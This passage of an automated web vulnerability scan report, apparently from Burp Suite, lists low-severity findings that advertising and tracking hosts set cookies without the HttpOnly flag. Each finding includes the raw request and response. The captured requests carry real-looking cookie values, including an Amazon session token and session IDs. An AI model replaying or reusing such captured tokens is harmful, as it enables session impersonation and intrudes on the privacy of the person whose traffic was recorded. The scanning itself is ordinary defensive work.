P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 12 May 2011 13:30:18 GMT
Server: QS

9.86. http://pixel.quantserve.com/seg/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /seg/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/r;a=p-444Ux5EmpXDp6;rand=95187947;redirect=http://aud.pubmatic.com/AdServer/Artemis?dpid=1&segid=!qcsegs HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dpsync.html?upixid=6&pubid=398&dp=1
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=EGwBOgHcBoHxDhmtEqlQr6INoQyrELEFAwyUAgMOqzAQ

Response

HTTP/1.1 302 Found
Connection: close
Location: http://aud.pubmatic.com/AdServer/Artemis?dpid=1&segid=D,T,5802,5798,5789,5785
Set-Cookie: d=EA4BOgHdBoGSDhmtEqlQr6INoQyrELEFAwyUAgMOqzAQ; expires=Wed, 10-Aug-2011 13:34:31 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 12 May 2011 13:34:31 GMT
Server: QS

9.87. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=2724386019227846218 HTTP/1.1
Host: r.openx.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/networks-exchanges/overview
Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:37 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd; expires=Sat, 11-May-2013 13:34:37 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
9.88. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=3482&1=999 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2716&action=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oZ2RNEVNFLw1rkIl8X-P-yLlEJpCYSMxdqNq6lvFdNFh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MB0Y7JvKfSWNYnBltaP_EmvZ3jqED7k2YniAtZPVqfFWyqMSMg2wplko20za_zfIcXaDNf6CpNnts8TY8puNrbeBKdSjyOjws--qAHMHtbI6SyKBbydkRUpjuoBRWw9N2QWlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib_dL8EW6T8qzMgGN-UfAL4hvOC7fCrKQjypg3ZZDmIIRdMbH4VAaTP3yeuIT8bUYpjNxWhaps5334qiA6przrOBR9dy7mebSJ94duif8USNC67lakY1-Wx08qAAHUQtknHQ7xnjMvY9ljRz8Oso1hdOAl8yAkjzMu60avymcp27zhmAaygIZH6vh6o5wNjgjNdonijTulYljYeiITtnJ-obiQEWW_mIpBZLcLt_p7SN9vijLbJjf63yiGSwbKyG2dGugnhWf2jLB_cEY-73f83M-Qp-ZlRKwcQuBR1ztGiFSZj4LpSPmviro5cgHdk9eJt4MMqelir0IqM1jmPswFFzniMTjL4-dEMDP4r05gYjUzZycDMwIM-JRZdaXayxbU-AwRV7xlAm5ebgZQKvg7WfQ1UAcQ-GE71_vlGriBwl0yRDK3jK3JAuWDuOfs2KJrs13LhVuZ9GXfqJdAYatFTpdnV7arjamYRVy18OpW4nYo4YOSWlJdDfSV-fwq8HgeaN-3cp1FzgjDVOVLZ2VhYwL507hxRulwL5vm7cb7KsO1XFt8hxAzJqAYOCL7WjL0qxTgxm3fdOYdOttFZUxr5r0A9mv0F_QBoXzpi8rJ_c6DrDzy9pG89s1Q06scIKHZgyDJezpNhgVkSmU0kpar5BAJuG6G30x3tmAb2j7nSNJ4ut2MaV0ROqJMzw9NFFerOKSq0jn7Z8ml_Aq0G6qyi-_p_3NfTE1kiDIdgNbUC9syknt2eSBNZW0WI7HO06yZy2SvSB5gCfomHd71CeO9uXWDgvZffEe1VrTUdxOH4gfGVkOqzE_jRzdjQRhmyVCwoc_2QRp83dWLTsWWFAIqAtnczfxrFIRAQH9jWHUPud-tHjVA42UgJXi7E-Ez_fNnbIdhDyg95Mh1WycRjhJXv8ATRtHD8vb9Vg5SwvqNhrNZsvJnUfvCegfWPkjFXygnPnoVxBMRnVTY50l5bdMYetqdZbuYYw5z5lUxbXkdIEwU2hncdLYoeK7ANErfukyrvNB8AfsR6D54cbJAyko95iDfbO-X1OEuSdYaVrz3olMX3vxG0LpmKD-Soh53aYJpCPcsWWbSJo-8gq8nYPQ6ByEPHScXR_eqXeoOaqn2ootB5duWe6vOtfx6TZyGJGsbGD1xkmmTSZiXiOf1UbISqo; fc=Son_Yybuxp_4VLqW1c6IRgpgpID-Wq7vfB3O6HP3oULbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOyzAmjEmfIrmEjGls5nEu5ZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; pf=isLx4tnkAuIiDQmRHjDSl29yIVHNlRpRhyM6ibTjqZN4MaYm-hBniQ2x_WbJU5VofR8HsN28iFo6HdZJoYg634vArNzG1QqMSLzk0Y7eRlHjhKTZoZfl0UmM4YAE9VltLd4zaBhLXK6dA3tQW6GTY_mhMXcZkp2CGVOUe9dNA1dLc3SbvsAbpvKUhZ_1F-gMqt697FUnnCyNJa5eXuHVqkYk9oOpEEnBnxokixh0TAcnTloknPCKo_m2KWZ0znMHGX1FGgNaH1QNLww2o9FWDf92KpcEjM9puswoJnlptpg_Ua1SMLgL8e4oitE3gQEt0IYL2CsvvDQbzbzoZi58WVFU2_HfnlKzH2WjiB0I74yjr5MEZ55HOjknaleEn8uqphJLAkUsMWh_vdfMYZ4DsAqVswvpKACSML7qepV3TXcVzrbaB5_N9dG_mUB3DBQpHCwQOntCh3wzWqFyTO9sCmbID1pM7GdJCmEvQvhgCerVKPuxNShLT7BdA74b9PIpJFJv0bKrvIAXiY5kxeBqDZM9McQOVbCG47DlR2tl0RZrXlLfPhjB-LAv0hBAzyAT8WyNLsptBsE0pyyMNzm8KTDTfIrxKwKcgVAF0j3DpG-Ah_L2mBEhIVZyz3v4hUv82NTphEWhwEZTsAeCcCRJGQ16FhMiQjewtL7hTKHHtYomz6Mgv9ntnMipgM9tObOSRi5sdEi6v2SSHlqkNcZ1Insylw9OuZiK2Z9Z1ZInGi2VyX45sYdTfBGAwKx_QKsRDOFWXyC8BwuYcP4g_M8_5sW-t1RZ1RZoZx7lrsMhMHodIDnIK6ly468s-StQw1rNNbnQrRiBaZdoox-8l-4ssS8cnCaJbHr6avLClL1L-ZgHVS17gTosFV1LPoOJqMoPVx8L9V4GQ55oLDrsRz9rTx9FeqPBBvBYGO1SdqujwXgi0vu0SmNRlepXu23ylR2425RDJExopm1fmCCVJh_u9NPFwH371j224eEs7ZO_Ajtb9hEO5hT0MYYwff0a4aDJ8dVm-HlCOmQllIxHHVPmqo5POfQNhu-I5BtsxdNdff3L0rrE_rQqKLBssQ48bm9_mXQzReNjx3lXy785TIo-y5veNkje6bZOCdvzPqpApnQKiSIwki5f-ITER4DSY4219M583u_ZPKiH6Ea4p59q66AhR0SCoMm0IXZ_t5_lhYgWzvjS6P-UHDNUBWN18PSjuJp9aVntFwJIXFrQO8XwyhujvEUOLmkRuJtqn5C1FWr3rHK_ua4i4QGywfYupaV2fuScMz9nUn-9DR4XMyfjq6f9MS-DaFKt2RaSz_BBjJKiIA7uafV8NNMTbjh0U1qug__vmYjXW251NXxsKK_4qFzSypNenDnJ6HQ-3068v6hBJfEyf0yd-2fLUXx6iqh9wMyw-RaWvEndJRgsZP3zOckxnpD1Bh0doyFi9Md6WZu8mx8U3kUMFDpZ0SqI-5d7X_-8-uyf42RpEQk10dwHo6E6IPJGWiCATH5pcXIPM9vPxG-uEMBzxe02yDopCwxH8LV8wxWtacb8pPjx7gKH5cGBR1KqovJK3yVBhrs2V7Q; rrs=1%7C6%7C3%7C4%7C1002%7C6%7C7%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15106%7C15106%7C15104%7C15105%7C15106%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 13:31:36 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:31:36 GMT

GIF89a.............!.......,...........D..;
9.89. http://r1-ads.ace.advertising.com/site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNTA1MTgzMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=uQqyN5pqCIxFGqrovMg3sY4XSKMCItdxygQ3WXsMIsY4FLDCA9qxygAZhXsMI0eDGLDCw3gxygw7NYsMIMa4FLDCbGexygg2kXsMIsjmGLDC6ijxygAmhXsMIAY4FLDCdDmxyggihXsMIgJaGLDCcbpxygAhhXsMIca4FLDCEHoxygwoyasMIoa4FLDC4Goxygw2kXsMIYnXGLDCWGoxygwKOasM1q6AaMrhfV7qDEysGtYkBMAoNXAtmZOiGgasjMAbUa8iNSPC73cBwtIuDUAsFyrZrgqRmCrnD8ekGrcl0Pw6iaIvTC1A0kdxKzq7DEwcGrMtyNw2sasypewAP7lxKDKYE8KIGA1sVTAJqaonj+OBXTjhWHJwFsb0F8rr5XAhTaI7zCVBLRqh3jq/FEqXG3/nDbAIcYUJ1+vBVSrBDSW60awuhahBdPiB5GKvGcuKGrLmOYALjYEmGw5oGhpBxbfRYmqRHU/XGbUh4W2gLYwkxSyBvRph3OrdHAPpGL+s3cQ7jaw4z2CCCPqhjA; F1=BEGpK3kAAAAAz04CAEAAgEgAAAAAVK6CAEAAgEgAAAAA6N/CAEAAgEABAAAABAAAAYAASEA; BASE=Rgwq5yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2ufXu4QL44U5Tp5J7h57WACK9D9olo7ZgEU+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zA+A9p1kL5hoC+WRIusIIHq0xcWEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QshLve3uV6nucXOOzq0kGDGuxO!; ROLL=boAnv2Cov1BglnGDmmmzcgHSg94V6NBUl5QpXT083Kaw4lx9LehaUKI!

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 13:31:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.755601.0XMC
Set-Cookie: C2=tE+yN5pqCIxFGcnovMg3sYAHSK8BItdRvfQ3WX07HsY4F9+BA9qRvfAZhX07H0eDG9+Bw3gRvfw7NY07HMa4F9+BbGeRvfg2kX07HsjmG9+B6ijRvfAmhX07HAY4F9+BdDmRvfgihX07HgJaG9+BcbpRvfAhhX07Hca4F9+BEHoRvfwoya07Hoa4F9+B4GoRvfw2kX07HYnXG9+BWGoRvfwKOa071q6AaMrBcU7qDEysGfUkBMAoNXIcmZOiGgasjMAbUaESNSPC73cBwtIuDUAsFknZrgqxiBrnD8ekGdYl0Pw6iaQeTC1A0kdRHyq7DEwcGdItyNw2sa0hpewAP7lRHCKYE8KIGywsVTAJqawWj+OBXTjBTGJwFsb0Funr5XAhTaQqzCVBLRqB0iq/FEqXGp7nDXAIcYc41+vBVSrh/QW60a4dhahBdPih1FKvGcuKGdHmOYALjYMVGw5oGTlBxbfxUlqRHU/XGNQh4W2gLY4TxSyBvRpB0NrdHAPpG95s3cQ7ja4nz2yBCPqBgD; domain=advertising.com; expires=Sat, 11-May-2013 13:31:25 GMT; path=/
Set-Cookie: F1=B0S4L3EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Sat, 11-May-2013 13:31:25 GMT; path=/
Set-Cookie: BASE=Rgwq5yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uHXu4QL44U5Tp5J7h57WACK9D9olo7ZgEU+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zA+A9p1kL5hoC+WRIusIIHq0xcWEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QshLve3uV6nucXOOzq0kGDGuxO!; domain=advertising.com; expires=Sat, 11-May-2013 13:31:25 GMT; path=/
Set-Cookie: ROLL=boAno2C+ORAg3QH!; domain=advertising.com; expires=Sat, 11-May-2013 13:31:25 GMT; path=/
Set-Cookie: 1468728=_4dcbe12d,6658486637,755601^894875^1^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 12 May 2011 13:31:25 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 662

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000755601/mnum=0000894
...[SNIP]...
9.90. http://rcm.amazon.com/e/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /e/cm?t=oruf-20&o=1&p=9&l=sb3&pvid=062B51BD8CA550D9&ref-url=http%3A//orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html&ref-title=The%20Orange%20Orb%3A%20Planets%20Align%20on%20Friday%20the%2013th%2C%20AND...&ref-ref=&bgc=FFFFFF&bdc=C80109&pcc=990000&tec=000000&tic=DC1D25&ac=FFFFFF&pvc=6E6E6E&mp=1&hl=1&dsc=1&title=82,101,103,97,110,32,76,101,101,39,115,32,83,116,111,114,101,32,111,110,32,65,109,97,122,111,110,46,99,111,109,33&f=ifr&e=utf-8 HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lc-main=en_US; s_pers=%20s_ev15%3D%255B%255B%2527Typed/Bookmarked%2527%252C%25271303907323249%2527%255D%252C%255B%2527Typed/Bookmarked%2527%252C%25271303911653101%2527%255D%252C%255B%2527www.webstoresellmore.com%2527%252C%25271303919819108%2527%255D%255D%7C1461772619108%3B%20s_dl%3D1%7C1303921676354%3B%20gpv_page%3DUS%253AWS%253APricing-Options%253APricing-Options%7C1303921676363%3B; _mkto_trk=id:810-GRW-452&token:_mch-amazon.com-1303907323369-39830; session-token=45h19hdOPPJ6wOOfLpRhuZ5a+tHbJN0Yn1Pz8Mt9SC8iEu30sQidjghp+yiRcg/lJEw2MQjNsYBTvrnFumfZbugF8QO2HHy6dOzlE94Gg05TyeLIRgBJLrI+NTqi0wO2wJ403GqaJfi7BSth5OxeeVFJ5+daAcNcUOZouvxnpaoJRaKE8bf5vC00RyndOSQu2HP0E3/TBVDD9LtynyiLetGL0vfAM8K9mCUTAxjCXQMh0pHaCNNAFi5s78XmwXgR; __utma=194891197.750670333.1304243790.1304243790.1304243790.1; __utmz=194891197.1304243790.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ubid-main=177-8019787-9467434; session-id-time=2082787201l; session-id=175-8214368-0288160; apn-user-id=a9998262-6685-4eee-85f3-cb8592198aeb

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:18 GMT
Server: Server
Set-Cookie: apn-user-id=a9998262-6685-4eee-85f3-cb8592198aeb; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 3949
nnCoection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
9.91. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25277&adId=19976&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277&kltstamp=2011-4-12%208%3A31%3A14&ranreq=0.5169705713633448&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
